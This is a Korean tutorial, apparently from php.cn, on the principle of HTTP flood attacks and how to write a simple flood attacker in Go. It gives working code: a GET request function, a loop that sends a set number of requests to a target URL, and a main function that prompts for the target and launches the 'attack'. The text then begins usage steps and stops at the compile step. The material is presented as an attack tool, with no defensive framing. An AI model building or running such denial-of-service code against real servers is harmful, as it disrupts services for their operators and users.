Golang의 플러드 공격 원리에 대해 이야기해 보겠습니다.-Golang-php.cn

Golang의 플러드 공격 원리에 대해 이야기해 보겠습니다.

PHPz

풀어 주다： 2023-03-31 10:52:13

원래의

777명이 탐색했습니다.

플러드 공격은 대량의 요청을 위조하여 대상 서버에 과부하를 주어 서비스를 사용할 수 없게 만드는 악의적인 네트워크 공격 방법입니다. 그렇다면 Golang을 사용하여 간단한 플러드 공격자를 작성하는 방법은 무엇입니까? 이 기사에서는 Golang의 플러드 공격의 원리, 코딩 및 사용법을 소개합니다.

1. 홍수 공격의 원리

먼저 홍수 공격의 원리를 알아봅시다. 일반적으로 네트워크 리소스를 탐색할 때 주소 표시줄에 웹사이트 주소를 입력하면 HTTP 요청이 대상 서버로 전송됩니다. 이 HTTP 요청에는 필요한 매개변수가 포함되어 있으며, 서버는 요청을 받은 후 해당 리소스나 데이터를 반환합니다.

플러드 공격의 원리는 정상적인 요청을 시뮬레이션하는 것이지만, 위조된 요청이 많이 필요하므로 서버가 이러한 요청을 지속적으로 처리하게 되어 서버 리소스가 고갈되고 정상적인 요청에 계속 응답할 수 없게 되며, 결국 대상 서버가 충돌하게 됩니다.

플러드 공격의 원리는 매우 간단하고, 코드 구현도 매우 쉽습니다.

2. 코드 작성

다음으로 코드 작성을 시작합니다.

가장 간단한 네트워크 요청 코드 작성:

func httpGet(url string){
    resp, err := http.Get(url)
    if err != nil {
        log.Println(err.Error())
        return
    }
    defer resp.Body.Close()
}

로그인 후 복사

위 코드는 간단한 GET 요청을 구현하고 응답 본문을 닫습니다.

다음으로, 홍수 공격을 유발하는 함수를 구현해야 합니다. 플러드 공격을 달성하기 위해 네트워크 요청을 지속적으로 시작하려면 무한 루프를 정의해야 합니다.

func flood(url string, num int){
    i := 0
    for {
        i++
        httpGet(url)
        if i > num{
            log.Println("Attack finished.")
            return
        }
    }
}

로그인 후 복사

위 코드에서는 전송된 요청 수를 기록하기 위해 변수 i를 정의했습니다. 각 루프에서 httpGet 함수를 호출하여 대상 서버에 요청을 보냅니다. 전송된 요청 수가 설정된 수보다 크면 플러드 공격이 중지됩니다. 위 코드에서는 로그 패키지를 사용하여 공격이 종료되었다는 메시지를 출력합니다. 또한 공격 중에 자세한 정보를 출력하여 향후 분석을 용이하게 할 수도 있습니다.

플러드 공격을 구현하는 동안 메인 프로그램의 중지 조건도 고려해야 합니다. 키보드 입력을 통해 프로그램 종료를 수동으로 제어할 수 있습니다. 다음 코드를 추가하세요.

func main(){
    var url string
    var num int
    
    fmt.Print("Target url: ")
    fmt.Scanf("%s", &url)
    
    fmt.Print("Number of requests: ")
    fmt.Scanf("%d", &num)
    
    fmt.Println("Press Enter to start attack.")
    bufio.NewReader(os.Stdin).ReadBytes('\n')
    
    flood(url, num)
}

로그인 후 복사

프로그램을 실행한 후 대상 URL과 요청 수를 프로그램에 입력한 다음 Enter 키를 눌러 공격을 시작할 수 있습니다. 공격 횟수가 설정된 횟수에 도달하거나 프로그램을 수동으로 중지하면 공격이 종료됩니다.

3. 사용 방법

아래에서는 이 프로그램을 사용하여 홍수 공격을 수행하는 방법을 소개합니다.

먼저 터미널에 프로그램 디렉터리를 입력하고 go build 명령을 사용하여 컴파일해야 합니다.